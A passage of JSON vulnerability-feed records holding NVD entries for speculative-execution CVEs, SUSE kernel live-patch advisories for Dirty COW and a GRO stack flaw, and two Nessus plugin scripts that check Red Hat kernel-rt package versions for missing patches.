"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3639", "published": "2018-05-22T12:29:00", "title": "CVE-2018-3639", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-10T12:22:17", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.", "modified": "2019-04-23T19:30:00", "id": "CVE-2017-5753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5753", "published": "2018-01-04T13:29:00", "title": "CVE-2017-5753", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "suse": [{"lastseen": "2016-10-31T13:28:00", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.62-60_62 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001486).\n\n", "modified": "2016-10-31T11:08:38", "published": "2016-10-31T11:08:38", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00072.html", "id": "SUSE-SU-2016:2673-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 7 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.57-60_35 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:10:09", "published": "2016-10-26T03:10:09", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00058.html", "id": "SUSE-SU-2016:2638-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 4 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.59-60_45 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:09:35", "published": "2016-10-26T03:09:35", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00057.html", "id": "SUSE-SU-2016:2637-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 6 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-26T01:27:43", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.59-60_41 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bsc#1001487).\n\n", "modified": "2016-10-26T03:08:28", "published": "2016-10-26T03:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00055.html", "id": "SUSE-SU-2016:2635-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 5 for SLE 12 SP1 (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T08:54:14", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise MRG\n2.5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2016-2107.NASL", "href": "https://www.tenable.com/plugins/nessus/94315", "published": "2016-10-27T00:00:00", "title": "RHEL 6 : MRG (RHSA-2016:2107) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2107. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94315);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n script_xref(name:\"RHSA\", value:\"2016:2107\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2016:2107) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise MRG\n2.5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q)\nOR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with\nTransparent Ethernet Bridging(TEB) GRO support, is vulnerable to a\nstack overflow issue. It could occur while receiving large packets via\nGRO path; As an unlimited recursion could unfold in both VLAN and TEB\nmodules, leading to a stack corruption in the kernel. (CVE-2016-7039,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8666\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2107\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2107\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.10.0-327.rt56.198.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.10.0-327.rt56.198.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:54:14", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2016-2110.NASL", "href": "https://www.tenable.com/plugins/nessus/94316", "published": "2016-10-27T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2016:2110) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2110. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94316);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n script_xref(name:\"RHSA\", value:\"2016:2110\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2016:2110) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q)\nOR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with\nTransparent Ethernet Bridging(TEB) GRO support, is vulnerable to a\nstack overflow issue. It could occur while receiving large packets via\nGRO path; As an unlimited recursion could unfold in both VLAN and TEB\nmodules, leading to a stack corruption in the kernel. (CVE-2016-7039,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8666\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2110\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2110\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}
